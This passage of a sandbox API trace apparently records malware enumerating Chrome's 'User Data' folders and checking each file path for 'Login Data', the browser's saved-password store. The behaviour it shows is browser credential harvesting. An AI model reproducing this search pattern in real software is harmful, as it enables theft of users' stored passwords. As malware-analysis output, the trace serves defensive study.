(in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86989eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86989eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86989eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="Google Docs.ico.md5", cAlternateFileName="GOOGLE~1.MD5")) returned 0 [0162.887] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0162.887] VirtualQuery (in: lpAddress=0x9258c0, lpBuffer=0x2dee24, dwLength=0x1c | out: lpBuffer=0x2dee24*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.887] GetProcessHeap () returned 0x8e0000 [0162.887] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9258c0 | out: hHeap=0x8e0000) returned 1 [0162.887] VirtualQuery (in: lpAddress=0x9257b0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.887] GetProcessHeap () returned 0x8e0000 [0162.887] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257b0 | out: hHeap=0x8e0000) returned 1 [0162.887] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86989eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86989eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_crx_aohghmighlieiainnegkcijnfilokake", cAlternateFileName="_CRX_A~1")) returned 0 [0162.888] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0162.888] VirtualQuery (in: lpAddress=0x925618, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.888] GetProcessHeap () returned 0x8e0000 [0162.888] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925618 | out: hHeap=0x8e0000) returned 1 [0162.888] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.888] GetProcessHeap () returned 0x8e0000 [0162.888] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.888] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d370c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Data", cAlternateFileName="WEBDAT~1")) returned 1 [0162.888] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.888] lstrlenW (lpString="\\") returned 1 [0162.888] GetProcessHeap () returned 0x8e0000 [0162.888] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.888] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.888] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.888] lstrlenW (lpString="Web Data") returned 8 [0162.888] GetProcessHeap () returned 0x8e0000 [0162.888] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xaa) returned 0x925550 [0162.888] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Web Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data" [0162.889] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.889] GetProcessHeap () returned 0x8e0000 [0162.889] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.889] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpSrch="Login Data") returned 0x0 [0162.889] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.889] GetProcessHeap () returned 0x8e0000 [0162.889] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.889] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d608d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Data-journal", cAlternateFileName="WEBDAT~2")) returned 1 [0162.889] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0162.889] lstrlenW (lpString="\\") returned 1 [0162.889] GetProcessHeap () returned 0x8e0000 [0162.889] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0162.889] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0162.889] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.889] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0162.889] lstrlenW (lpString="Web Data-journal") returned 16 [0162.889] GetProcessHeap () returned 0x8e0000 [0162.889] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x925550 [0162.889] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0162.889] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Web Data-journal" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" [0162.889] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.889] GetProcessHeap () returned 0x8e0000 [0162.889] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0162.889] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal", lpSrch="Login Data") returned 0x0 [0162.889] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.889] GetProcessHeap () returned 0x8e0000 [0162.889] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0162.889] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d608d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Data-journal", cAlternateFileName="WEBDAT~2")) returned 0 [0162.889] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.890] VirtualQuery (in: lpAddress=0x925400, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.890] GetProcessHeap () returned 0x8e0000 [0162.890] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925400 | out: hHeap=0x8e0000) returned 1 [0162.890] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.890] GetProcessHeap () returned 0x8e0000 [0162.890] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.890] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVWhitelist", cAlternateFileName="EVWHIT~1")) returned 1 [0162.890] lstrcmpiW (lpString1="EVWhitelist", lpString2=".") returned 1 [0162.890] lstrcmpiW (lpString1="EVWhitelist", lpString2="..") returned 1 [0162.890] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.890] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.890] lstrlenW (lpString="\\") returned 1 [0162.890] GetProcessHeap () returned 0x8e0000 [0162.890] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.890] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.890] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.890] lstrlenW (lpString="EVWhitelist") returned 11 [0162.890] GetProcessHeap () returned 0x8e0000 [0162.890] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x925360 [0162.890] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="EVWhitelist" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0162.890] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.890] GetProcessHeap () returned 0x8e0000 [0162.890] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.890] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 79 [0162.890] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned 79 [0162.890] lstrlenW (lpString="\\*.*") returned 4 [0162.890] GetProcessHeap () returned 0x8e0000 [0162.890] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa8) returned 0x925408 [0162.890] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0162.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*" [0162.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0162.894] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.894] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.894] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.894] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.894] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0162.894] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.894] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.894] GetProcessHeap () returned 0x8e0000 [0162.894] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0162.894] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.894] GetProcessHeap () returned 0x8e0000 [0162.894] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0162.894] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileTypePolicies", cAlternateFileName="FILETY~1")) returned 1 [0162.894] lstrcmpiW (lpString1="FileTypePolicies", lpString2=".") returned 1 [0162.894] lstrcmpiW (lpString1="FileTypePolicies", lpString2="..") returned 1 [0162.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0162.894] lstrlenW (lpString="\\") returned 1 [0162.894] GetProcessHeap () returned 0x8e0000 [0162.894] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0162.894] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0162.894] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0162.894] lstrlenW (lpString="FileTypePolicies") returned 16 [0162.895] GetProcessHeap () returned 0x8e0000 [0162.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xaa) returned 0x925360 [0162.895] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0162.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="FileTypePolicies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0162.895] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.895] GetProcessHeap () returned 0x8e0000 [0162.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0162.895] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 84 [0162.895] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned 84 [0162.895] lstrlenW (lpString="\\*.*") returned 4 [0162.895] GetProcessHeap () returned 0x8e0000 [0162.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925418 [0162.895] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0162.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*" [0162.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0162.895] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0162.895] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.895] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0162.895] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0162.895] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0162.895] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0162.895] VirtualQuery (in: lpAddress=0x925418, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.895] 